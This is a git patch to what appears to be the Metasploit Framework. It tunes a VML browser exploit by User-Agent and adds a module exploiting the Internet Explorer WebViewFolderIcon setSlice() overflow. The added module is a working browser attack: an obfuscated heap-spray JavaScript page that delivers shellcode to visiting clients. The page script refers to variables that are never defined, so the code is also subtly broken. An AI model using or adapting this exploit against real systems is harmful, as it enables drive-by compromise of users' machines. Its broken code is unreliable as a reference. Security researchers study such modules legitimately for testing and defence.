From f2ed69b99106db1be754929ebfd384875dc95482 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Wed, 27 Sep 2006 04:01:22 +0000
Subject: [PATCH] User-Agent detection for VML exploit. Randomization for the
 setSlice() exploit

git-svn-id: file:///home/svn/framework3/trunk@3978 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../windows/browser/ms06_055_vml_method.rb    |   7 +-
 .../windows/browser/webview_setslice.rb       | 116 ++++++++++++++++++
 2 files changed, 119 insertions(+), 4 deletions(-)
 create mode 100644 modules/exploits/windows/browser/webview_setslice.rb

diff --git a/modules/exploits/windows/browser/ms06_055_vml_method.rb b/modules/exploits/windows/browser/ms06_055_vml_method.rb
index 8c4c2319ff..50e7507464 100644
--- a/modules/exploits/windows/browser/ms06_055_vml_method.rb
+++ b/modules/exploits/windows/browser/ms06_055_vml_method.rb
@@ -55,10 +55,9 @@ class Exploits::Windows::Browser::MS06_055_VML_Overflow < Msf::Exploit::Remote
 
 		# Determine the buffer length to use
 		buflen = 1024
-		# if ()
-		# 	buflen = 65535
-		# end
-		buflen = 65535
+		if (request.headers['User-Agent'] =~ /Windows 5\.[123]/)
+			buflen = 65535
+		end
 		
 		# Encode the shellcode
 		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
diff --git a/modules/exploits/windows/browser/webview_setslice.rb b/modules/exploits/windows/browser/webview_setslice.rb
new file mode 100644
index 0000000000..38045df66f
--- /dev/null
+++ b/modules/exploits/windows/browser/webview_setslice.rb
@@ -0,0 +1,116 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote
+
+	include Exploit::Remote::HttpServer::Html
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Internet Explorer WebViewFolderIcon setSlice() Overflow',
+			'Description'    => %q{
+				This module exploits a flaw in the WebViewFolderIcon ActiveX control
+			included with Windows 2000, Windows XP, and Windows 2003. This flaw was published
+			during the Month of Browser Bugs project (MoBB #18).
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => 
+				[ 
+					'hdm', 
+				],
+			'Version'        => '$Revision: 3783 $',
+			'References'     => 
+				[
+					[ 'OSVDB', '27110' ],
+					[ 'BID', '19030' ],
+					[ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ]
+				],
+			'Payload'        =>
+				{
+					'Space'          => 1024,
+					'BadChars'       => "\x00",
+	
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
+				],
+			'DefaultTarget'  => 0))
+	end
+
+	def autofilter
+		false
+	end
+	
+	def on_request_uri(cli, request)
+
+		# Re-generate the payload
+		return if ((p = regenerate_payload(cli)) == nil)
+
+		# Encode the shellcode
+		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+		
+		# Get a unicode friendly version of the return address
+		ret_addr  = [target.ret].pack('H*')[0,4]
+
+		# Randomize the javascript variable names	
+		var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2)
+		var_unescape  = Rex::Text.rand_text_alpha(rand(30)+2)
+		var_x         = Rex::Text.rand_text_alpha(rand(30)+2)
+		var_i         = Rex::Text.rand_text_alpha(rand(30)+2)
+		var_tic       = Rex::Text.rand_text_alpha(rand(30)+2)
+		var_toc       = Rex::Text.rand_text_alpha(rand(30)+2)
+		
+		# Randomize HTML data
+		html          = Rex::Text.rand_text_alpha(rand(30)+2)
+		
+		# Build out the message
+		content = %Q|
+<html>
+<head>
+	<script>
+	try {
+	
+	var #{var_unescape}  = unescape ;
+	var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ;
+	
+	var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ;
+	while (#{var_buffer}.length <= 0x400000) #{var_buffer}+=#{var_buffer} ;
+
+	var #{var_x} = new Array() ;	
+	for ( var #{var_i} =0 ; #{var_i} < 30 ; #{var_i}++ ) {
+		#{var_x}[ #{var_i} ] = 
+			#{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +
+			#{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + 
+			#{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} + 		
+			#{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;
+	}
+	
+	
+   	for ( var #{var_i} = 0 ; #{var_i} < 1024 ; #{var_i}++) {
+		var #{var_tic} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );	
+		try { #{var_tic}.setSlice( 0x7ffffffe , 0 , 0 , #{target.ret} ) ; } catch( e ) { }
+		var #{var_toc} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );
+	}
+	
+	} catch( e ) { window.location = 'about:blank' ; }
+	
+	</script>
+</head>
+<body>
+#{html}
+</body>
+</html>		
+		|
+
+		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
+
+		# Transmit the response to the client
+		send_response(cli, content)
+	end
+
+end
+
+end